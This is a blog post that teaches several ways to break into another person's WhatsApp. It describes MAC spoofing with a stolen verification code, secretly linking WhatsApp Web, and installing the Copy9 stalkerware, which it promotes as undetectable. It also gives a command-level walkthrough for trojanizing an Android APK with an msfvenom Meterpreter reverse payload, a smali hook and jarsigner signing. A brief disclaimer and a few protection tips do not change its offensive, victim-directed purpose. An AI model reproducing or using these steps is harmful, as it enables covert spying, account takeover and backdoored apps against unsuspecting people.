TECHNOLOGY:WhatsApp Can be hacked

Wednesday, 4 April 2018

Image and video hosting by TinyPic

I will show you several methods how whatsApp can be hacked !! Okay now let's see
Disclaimer: The following content is intended to inform users about vulnerabilities in Whatsapp, I am in no way encouraging users to break down into someone’s privacy.
It is relatively easy for a person to snoop into someone’s whastapp if they have access to victim’s phone.
Method 1 : By changing the MAC Address
Note : Device must be rooted for this method
Step 1 : First of all, completely uninstall WhatsApp from your phone.
Step 2 : Obtain someone else’s phone which you want to access.
Step 3 : And find the MAC address of that phone. It’ll be in six pairs like- 01:43:65:87:98:cb
For Android, go to Settings – About phone – Status – WI-Fi MAC address.
For iPhone, go to Settings – General – About – WI-Fi Address.
For Windows phone, find this in Settings – About – More info – MAC address.
For BlackBerry, go to Options – Device – Device and Status info – WLAN MAC.
Step 4 : Now find your MAC address also and save both MAC addresses at any safe place.
Step 5 : Another step is install MAC spoofing apps for changing the MAC address of your phone. For iPhones install MacDaddy X or WifiSpoof. And for Android you can install some free apps like BusyBox and Terminal Emulator, which are available on google play store.
Step 6 : Now open app, in the terminal, type “ ip link show” to see a list of interfaces. Identify the one that has your MAC address — for this example, we’ll use the eth0 interface. In the terminal emulator, enter “ IP link set eth0 address XX:XX:XX:XX:XX:XX ” and “ ip link set eth0 broadcast XX:XX:XX:XX:XX:XX “, where eth0 is the interface you identified and XX:XX:XX:XX:XX:XX is your target’s MAC address. To check that you’ve successfully changed your MAC address, enter “ iplink show eth0 .”
Step 7 : Install WhatsApp on your phone but do not enter your phone number, enter your target’s phone number to set up WhatsApp rather than your own. Now catch the target’s phone second and last time for receiving whatsapp verification code, after getting that code, delete that message from the target’s mobile phone. Now all tasks have been done ENJOY!!
Step 8 : When you no longer need to access your target’s WhatsApp account, change your MAC address back to what it was. By following the same method as above.
Method 2 : Scanning the QR code
Note : This method doesn't require root but pay attention here when you follow the below method in victim phone its shows logged in device.
Image and video hosting by TinyPic

This method is simple and efficient way to keep an eye on one's Whatsapp conversations. You should have a PC/Laptop/android device and get an access to their phone for a minute!
Step 1 : In your pc/laptop open browser type in Url as http://web.whatsapp.com
For Android device you can download whatsweb App from playstore click here for download https://play.google.com/store/apps/details?id=com.whatsweb.app
Step 2 : Now Open WhatsApp on victim phone and go to WhatsApp Web from menu and scan the QR code shown in your PC/Laptop/android chrome browser
Thats it! Now whenever he/she is around you can simply open the Whatsapp web and check his messages.
Method 3 : Installing third-party app in victim mobile Copy9
Perhaps all of this spends complicated, but the real procedure is more than just simple. In essence, you will have to:
Step 1: download The Copy9 App
Step 2: Install it on targeted device
Step 3: Login to your control panel
Image and video hosting by TinyPic
on a PC. Done
Install i
t on targe
As you can see, the entire process takes no more than 5 minutes of your time.
It is specifically developed to be simple enough for average users and those who don’t even fully understand smartphones and how they work.
The bottom line is yes, you will be able to use it without a problem.
Here it should be mentioned that there is no risk of being detected!
The app works by connecting to the operating system and literally becoming part of it.
As such, the app has all the access to the OS on your phone, obviously.
The app cannot be detected by antivirus, malware software or on any other way.
Hard reset of a device won’t delete the app as well. At the end, we can add Copy9 is the safest app to use.
The hack Whatsapp online feature
Besides the hack Whatsapp online feature, Copy9 offers plenty of additional features!
 Besides the fact you will be able to read Whatsapp messages, the app allows you to read messages and monitor calls performed via other apps. All messenger apps are supported.
 Tracking the GPS location is possible as well. The app will determine the exact location of a smartphone within a matter of seconds.​
 Monitoring internet activities is just another feature. Although Whatsapp tracker option is associated with the internet, the feature here is a bit different.
 Basically, it allows for the user to block access to the web, limit it or check out what has been visited via the targeted device.
The full list of features is significantly long. In general, you will be able to hack Whatsapp chat history, monitor call, all messages, internet activity, GPS, detecting when a SIM card is changed and many other features.
Customer support is guaranteed and also more than just decent, which isn’t a case with apps of this kind!
The best part, you get a free trial, without a need to enter your credit card. If you don’t like it, after 48 hours simply delete the app and you are done.
However, most users who tried the free trial, have been using Copy9 ever since.

Method 4 : WhatsApp Tracker Mxspy app allows Hackers to Intercept and Read Your Encrypted Messages
Open this link >
Method 5 : Need kali linux operating system
Here are the basic steps
1.Generate the Meterpreter payload
2.Decompile the payload and the original apk
3.Copy the payload files to the original apk
4.Inject the hook into the appropriate activity of the original apk
5.Inject the permissions in the AndroidManifest.xml file
6.compile the original apk
7.Sign the apk using Jarsigner

First of all, we have to make the Meterpreter payload. We are going to use MSFVenom for this. The command is-
msfvenom -p android/meterpreter/Payload_Type LHOST=IP_Address LPORT=Incoming_Port -o meterpreter.apk
Replace Payload_Type by any of the following payloads available. The function of all these payloads are same, essentially they are all Meterpreter payloads, the difference is only in the method they use to connect to your Kali system. The available Payload_Types are –
You can use any one you like, I'm going to use reverse_https as an example.
Replace IP_Address by the IP address to which the payload is going to connect back to, i.e the IP address of the attacker's system. If you are going to perform this attack over a local network (eg. if the victim and attacker are connected to the same WiFi hotspot), your Local IP will suffice. To know what your local IP is, run the command –
If you are going to perform this attack over the Internet, you have to use your public IP address, and configure your router properly (set up port forwarding) so that your system is accessible from the Internet. To know your public IP, just google "My IP" and Google will help you out.
Replace Incoming_Port with the port no. which you want to be used by the payload to connect to your system. This can be any valid port except the reserved ones like port 80 (HTTP). I'm going to use 4895 as an example.
So run the command using replacing the keywords with appropriate values and MSFVenom will generate a payload "meterpreter.apk" in the root directory. Note that we specified the output file name using the "-o meterpreter.apk" argument in the command, so if you like, you can name it anything else also.

Step 2 : DECOMPILE the APKs:
Now we have to decompile the APKs, for this we are going to use APKTool. It decompiles the code to a fairly human-readable format and saves it in .smali files, and also successfully extracts the .xml files. Assuming you have already installed the latest apktool and also have the original apk file in the root directory, run the following commands –
apktool d -f -o payload /root/meterpreter.apk
apktool d -f -o original /root/Original_APK_Name
It will decompile the payload to "/root/payload" and the original apk to "/root/original" directory.

Now we have to copy the payload files to the original app's folder. Just go to "/root/payload/smali/com/metasploit/stage" and copy all the .smali files whose file name contains the word 'payload'. Now paste them in "/root/original/smali/com/metasploit/stage". Note that this folder does not exists, so you have to create it.

In the previous step, we just copied the payload codes inside the original apk, so that when the original apk is recompiled, it will contain the payload. But that doesn't necessarily mean that the payload will run. To ensure that the payload runs, we have to inject a hook in the original apk's .smali code. If you are wondering what is this hook thingy I'm talking about, well essentially it's a code which intercepts some specific function call and reacts to it. In this case, we are going to place the hook so that when the app is launched, it will also launch the payload with it.
For this, firstly we have to find out which activity to put it simply, activities are sections of code, it's similar to frames in windows programming is run when the app is launched. We can get this info from the AndroidManifest.xml file.
So open up the AndroidManifest.xml file located inside the "/root/original" folder using any text editor. If you know HTML, then this file will look familiar to you. Both of them are essentially Markup Languages, and both use the familiar tags and attributes structure e.g. Content . Anyway, look for an tag which contains both the lines –
On a side note, you can use CTRL+F to search within the document in any GUI text editor. When you locate that activity, note its "android:name" attribute's value. In my case, as you can see from the screenshot below, it is "com.piriform.ccleaner.ui.activity.MainActivity".
Those two lines we searched for signifies that this is the activity which is going to start when we launch the app from the launcher icon, and also this is a MAIN activity similar to the 'main' function in traditional programming.
Now that we have the name of the activity we want to inject the hook into, let's get to it! First of all, open the .smali code of that activity using gedit. Just open a terminal and type –
gedit /root/original/smali/Activity_Path
Replace the Activity_Path with the activity's "android:name", but instead of the dots, type slash. Actually the smali codes are stored in folders named in the format the "android:name" is in, so we can easily get the location of the .smali code in the way we did. Check the screenshot below and you will get an idea of what I'm trying to say.
Now search for the following line in the smali code using CTRL+F –
When you locate it, paste the following code in the line next to it –
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
What we are doing here is, inserting a code which starts the payload alongside the existing code which is executed when the activity starts. Now, save the edited smali file.

From Android Developers –
Additional finer-grained security features are provided through a "permission" mechanism that enforces restrictions on the specific operations that a particular process can perform.
If we do not mention all the additional permissions that our payload is going to need, it cannot function properly. While installing an app, these permissions are shown to the user. But most of the users don't care to read all those boring texts, so we do not have to worry about that much.
These permissions are also listed in the previously encountered AndroidManifest file. So let's open the AndroidManifest.xml of both the original app and the payload from the respective folders. The permissions are mentioned inside tag as an attribute 'android:name'. Copy the additional permission lines from the Payload's AndroidManifest to the original app's one. But be careful that there should not be any duplicate.
Here's my original app's AndroidManifest before editing –
After adding the additional ones from the Payload's AndroidManifest, my /root/original/AndroidManifest.xml looks like this –

Now th hard parts are all done! We just have to recompile the backdoored app into an installable apk. Run the following command –
apktool b /root/original
You will now have the compiled apk inside the "/root/original/dist" directory. But, we're still not done yet.

Step 7 : SIGN the APK:
This is also a very important step, as in most of the cases, an unsigned apk cannot be installed. From Android Developers –
Android requires that all apps be digitally signed with a certificate before they can be installed. Android uses this certificate to identify the author of an app, and the certificate does not need to be signed by a certificate authority. Android apps often use self-signed certificates. The app developer holds the certificate's private key.
In this case we are going to sign the apk using the default android debug key. Just run the following command –
jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA apk_path androiddebugkey
Be sure to replace the apk_path in the above command with the path to your backdoored apk file.
How to protect your whatsapp account:
You are viewing Most Recent Post WhatsApp Can be hacked
 Don’t hand over your phone to person you don`t trust.
 keep your message inbox secure with separate lock, so that no second person can read your message from text inbox.
 If someone is using Whatsapp web with your number then go to setting of your Whatsapp and click “log-out from all browser” or some similar option will be there.
 Enable two-step verification as follows:
 To enable two-step verification, open WhatsApp > Settings > Account >
Two-step verification > Enable .
 This step will ask you to create a password and will prevent someone else to use your number for Whatsapp verification.